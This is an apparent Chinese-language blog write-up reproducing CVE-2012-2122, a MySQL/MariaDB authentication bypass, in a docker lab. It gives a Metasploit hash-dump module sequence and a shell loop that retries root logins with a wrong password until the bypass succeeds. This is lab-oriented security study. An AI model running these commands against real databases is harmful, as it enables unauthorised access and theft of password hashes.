身份认证绕过漏洞复现 CVE-2012-2122

水下月 2021-01-21
Web安全 发布于 2021-01-21 11:39:07 阅读 151 评论 0

漏洞原因

当连接MySQL时,会导致memcmp返回一个非零值,会使MySQL认为两个密码是一样的。也就是说只要知道用户名,不断尝试登入SQL数据库漏洞。
影响:Mariadb和mysql版本:5.1.61、5.0.11、5.3.5,5.5.22

漏洞复现

1,cd /mysql/CVE-2012-2122
开启漏洞环境 docker-compose up -d
2,先用nmap扫描一下mysql的版本为5.5.23


3,msfconsole中的模块漏洞验证
msfconsole 进入msf
use auxiliary/scanner/mysql/mysql_authbypass_hashdump 选择该模块
set username root 设置用户
set rhosts xxxxxx 设置IP
run 开始运行


4,解hash,解出来登陆

5,mysql -u root -h xxxxxip -p

6,第2种方法 shell脚本
for i in `seq 1 1000`; do mysql -u root -password=bad -h xxxxxxxxip 2>/dev/null; done

mysql msf
本作品采用《CC 协议》,转载必须注明作者和本文链接
水下月
32 声望
暂无个人描述~
讨论数量: 0
排序:
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
支持 MD 帮助
水下月
未填写
  • 作者发布文章13
  • 作者收获粉丝0
  • 作者收到点赞5
  • 所有文章被收藏了0
  • 博客总访问量排行第11
  • 博客总访问量2820(每日更新)
文章归档
5 2021 年 2 月
6 2021 年 1 月
2 2020 年 11 月
查看所有博文
最新 最受欢迎
MySQL 身份认证绕过漏洞(CVE-2012-2122)复现 [1天前]
flask-ssti 漏洞复现 [4天前]
Shellshock 破壳漏洞 CVE-2014-6271 复现 [5天前]
CVE-2016-4437 (Apache Shiro 反序列化漏洞) 复现 [6天前]
flask 服务端模板注入漏洞复现 [2周前]
Jenkins 远程代码执行漏洞 CVE-2017-1000353 复现 1
cve-2017-12149 JBOOS 反序列化漏洞复现 1
CVE-2014-0160 心脏滴血漏洞复现 1
身份认证绕过漏洞复现 CVE-2012-2122 1
CVE-2019-11043 远程代码执行漏洞复现 1
© 2021 WANGAN.COM 帮助网安从业者成长;关注产业发展,做网络安全忠诚卫士!